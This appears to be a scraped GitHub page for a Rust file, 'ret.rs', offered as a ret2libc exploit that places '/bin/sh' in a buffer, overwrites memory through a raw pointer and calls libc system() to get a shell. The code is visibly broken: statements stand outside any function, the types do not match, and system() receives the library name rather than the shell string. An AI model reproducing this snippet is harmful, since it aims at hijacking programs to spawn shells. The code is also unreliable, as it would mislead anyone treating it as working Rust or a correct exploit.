-
Notifications
You must be signed in to change notification settings - Fork 7
/
Copy pathret.rs
38 lines (29 loc) · 1.13 KB
/
ret.rs
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
extern crate libc;
use libc::{c_void, system};
// define the buffer size and strings to be used
const BUFFER_SIZE : usize = 200;
let addr : u64 = 0x00000000; // set address of content to be overwritten
let libc_name : &[u8] = b"libc.so.6\0";
let gadget : &[u8] = b"/bin/sh\0";
// create a buffer to store data
let mut buf : [u8;BUFFER_SIZE] = [0u8;BUFFER_SIZE];
// store the libc and gadget strings in the buffer
let libc_base = copy_string(buf.as_mut_ptr() as *mut c_void, libc_name.as_ptr() as *const c_void);
let gadget_base = copy_string(buf.as_mut_ptr().offset(libc_name.len()) as *mut c_void, gadget.as_ptr() as *const c_void);
// set the address of the content to be overwritten
let mut pointer = addr as *mut u64;
/// set the address of the target buffer in the pointer
pointer.write(buf.as_ptr() as u64);
// call the ret2lib system call
unsafe { system(libc_base); }
// function to copy data from one memory location to another
fn copy_string (dest : *mut c_void, src : *const c_void) -> *mut c_void {
let mut size : u32 = 0;
unsafe {
while *src.offset(size as isize) != 0 {
size += 1;
}
libc::memcpy(dest,src,size);
}
dest
}